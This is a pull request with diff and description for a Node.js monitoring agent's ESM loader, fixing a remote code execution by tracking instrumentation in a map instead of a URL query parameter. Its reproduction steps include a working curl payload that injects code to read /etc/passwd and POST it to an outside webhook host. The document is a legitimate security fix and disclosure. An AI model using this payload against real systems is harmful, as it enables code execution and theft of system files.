### PR TITLE
security: updated esm loader track instrumentation by url in a map instead of in url to avoid remote code executions

### DIFF
--- a/esm-loader.mjs
+++ b/esm-loader.mjs
@@ -89,20 +89,48 @@ export async function resolve(specifier, context, nextResolve) {
       })
 
       // Keep track of what we've registered so we don't double register (see: https://github.com/newrelic/node-newrelic/issues/1646)
-      registeredSpecifiers.set(url, specifier)
+      registeredSpecifiers.set(url, { specifier })
     } else if (format === 'module') {
-      registeredSpecifiers.set(url, specifier)
-      const modifiedUrl = new URL(url)
-      // add a query param to the resolved url so the load hook below knows
-      // to rewrite and wrap the source code
-      modifiedUrl.searchParams.set('hasNrInstrumentation', 'true')
-      resolvedModule.url = modifiedUrl.href
+      addNrInstrumentation(resolvedModule)
+      registeredSpecifiers.set(url, { specifier, hasNrInstrumentation: true })
     } else {
       logger.debug(`${specifier} is not a CommonJS nor ESM package, skipping for now.`)
     }
   }
 
   return resolvedModule
+}
+
+/**
+ * This is purely done so that we can import the incoming specifier
+ * in the load hook.  It used to be used to determine if instrumentation existed
+ * for specifier but we found a RCE with that solution.
+ *
+ * @param {object} resolvedModule the result of call resolve on a specifier
+ */
+function addNrInstrumentation(resolvedModule) {
+  const modifiedUrl = new URL(resolvedModule.url)
+  modifiedUrl.searchParams.set('hasNrInstrumentation', 'true')
+  resolvedModule.url = modifiedUrl.href
+}
+
+/**
+ * Extracts the href without query params
+ *
+ * @param {string} url url of specifier
+ * @returns {string} new url without hasNrInstrumentation query param
+ */
+function removeNrInstrumentation(url) {
+  let parsedUrl
+
+  try {
+    parsedUrl = new URL(url)
+    url = parsedUrl.href.split('?')[0]
+  } catch (err) {
+    logger.error('Unable to parse url: %s, msg: %s', url, err.message)
+  }
+
+  return url
 }
 
 /**
@@ -123,30 +151,17 @@ export async function load(url, context, nextLoad) {
     return nextLoad(url, context, nextLoad)
   }
 
-  let parsedUrl
+  url = removeNrInstrumentation(url)
 
-  try {
-    parsedUrl = new URL(url)
-  } catch (err) {
-    logger.error('Unable to parse url: %s, msg: %s', url, err.message)
+  const pkg = registeredSpecifiers.get(url)
+
+  if (!pkg?.hasNrInstrumentation) {
     return nextLoad(url, context, nextLoad)
   }
 
-  const hasNrInstrumentation = parsedUrl.searchParams.get('hasNrInstrumentation')
+  const { specifier } = pkg
 
-  if (!hasNrInstrumentation) {
-    return nextLoad(url, context, nextLoad)
-  }
-
-  /**
-   * undo the work we did in the resolve hook above
-   * so we can properly rewrite source and not get in an infinite loop
-   */
-  parsedUrl.searchParams.delete('hasNrInstrumentation')
-
-  const originalUrl = parsedUrl.href
-  const specifier = registeredSpecifiers.get(originalUrl)
-  const rewrittenSource = await wrapEsmSource(originalUrl, specifier)
+  const rewrittenSource = await wrapEsmSource(url, specifier)
   logger.debug(`Registered module instrumentation for ${specifier}.`)
 
   return {

--- a/test/unit/esm-instrumentation.test.mjs
+++ b/test/unit/esm-instrumentation.test.mjs
@@ -28,8 +28,8 @@ tap.test(
       './test/lib/test-mod-instrumentation.mjs'
     await td.replaceEsm('../../index.js', {}, { agent: fakeAgent })
     const loader = await import('../../esm-loader.mjs')
-    loader.registeredSpecifiers.set(MOD_URL, 'test-mod')
-    const data = await loader.load(`${MOD_URL}?hasNrInstrumentation=true`, {}, sinon.stub())
+    loader.registeredSpecifiers.set(MOD_URL, { specifier: 'test-mod', hasNrInstrumentation: true })
+    const data = await loader.load(MOD_URL, {}, sinon.stub())
     const mod = await import(
       `data:application/javascript;base64,${Buffer.from(data.source).toString('base64')}`
     )
@@ -64,8 +64,11 @@ tap.test(
 
     const loader = await import('../../esm-loader.mjs')
 
-    loader.registeredSpecifiers.set(MOD_URL_SPECIAL, 'test-mod')
-    const data = await loader.load(`${MOD_URL_SPECIAL}?hasNrInstrumentation=true`, {}, sinon.stub())
+    loader.registeredSpecifiers.set(MOD_URL_SPECIAL, {
+      specifier: 'test-mod',
+      hasNrInstrumentation: true
+    })
+    const data = await loader.load(MOD_URL_SPECIAL, {}, sinon.stub())
 
     const mod = await import(
       `data:application/javascript;base64,${Buffer.from(data.source).toString('base64')}`
@@ -94,8 +97,8 @@ tap.test(
     })
     await td.replaceEsm('../../index.js', {}, { agent: fakeAgent })
     const loader = await import('../../esm-loader.mjs')
-    loader.registeredSpecifiers.set(MOD_URL, 'test-mod')
-    const data = await loader.load(`${MOD_URL}?hasNrInstrumentation=true`, {}, sinon.stub())
+    loader.registeredSpecifiers.set(MOD_URL, { specifier: 'test-mod', hasNrInstrumentation: true })
+    const data = await loader.load(MOD_URL, {}, sinon.stub())
     const mod = await import(
       `data:application/javascript;base64,${Buffer.from(data.source).toString('base64')}`
     )


### PR DESCRIPTION
<!--
Thank you for submitting a Pull Request.

This code is leveraged to monitor critical services. Please consider the following:
* Tests are required.
* Performance matters.
* Features that are specific to just your app are unlikely to make it in.

Ensure that your Pull Request title adheres to our Conventional Commit standards
as described in CONTRIBUTING.md

Please update the Pull Request description to add relevant context or documentation about
the submitted change.
-->
## Description

We had a report about a potential Remote Code Injection(RCE).  Although technically true the risk of this happening is lower 
than the initial report.  It requires customers to be importing paths with tainted strings and then provide this attack vector.


```js
import express from 'express'

const app = express()

app.get('/', async (request, response) => {
  const { lang } = request.query
  const { joke } = await import(`./strings/${lang}.mjs`)
  response.send(joke)
})

app.listen(7777, () => {
  console.log('Listening at http://localhost:7777')
})
```

Note: If `request.query.lang` was never imported as part of path this RCE does not exist.  


## Steps to reproduce

 1. `npm i express newrelic`
 1. Use this sample app above.
 1. Create a newrelic config.
 1. Run `node --loader newrelic/esm-loader.mjs index.mjs`
 1. `curl "http://localhost:7777/?lang=en.mjs?hasNrInstrumentation=true%23';eval('console.log\x28\x27INJECTED\x27\x29\x0Aimport\x28\x27child_process\x27\x29\x0A\x20\x20.then\x28childProcess\x20\x3D\x3E\x20childProcess.execSync\x28\x27cat\x20\x2Fetc\x2Fpasswd\x27\x29\x29\x0A\x20\x20.then\x28data\x20\x3D\x3E\x20Promise.all\x28\x5Bdata\x2C\x20import\x28\x27http\x27\x29\x5D\x29\x29\x0A\x20\x20.then\x28\x28\x5Bdata\x2C\x20http\x5D\x29\x20\x3D\x3E\x20\x7B\x0A\x20\x20\x20\x20http.request\x28\x27http\x3A\x2F\x2Fapi.webhookinbox.com\x2Fi\x2FqzSmWSJa\x2Fin\x2F\x27\x2C\x20\x7B\x0A\x20\x20\x20\x20\x20\x20method\x3A\x20\x27POST\x27\x0A\x20\x20\x20\x20\x7D\x29.end\x28data\x29\x0A\x20\x20\x7D\x29');'"`


If you use this PR and repeat steps above you will not see the `INJECTED` string in the console nor will it post the contents of `/etc/passwd` to the webhook. 


## Context

It is worth noting we will still append `hasNrInstrumentation` to urls and then remove on wrap. But we will not rely on this to determine instrumentation.  I have found that if we do not modify the resolved specifier url we cannot do imports within the load hook.  As we have discussed as a team this entire loader is getting re-tooled to support Node 20. I just had to address this as we have SLAs on security reports.
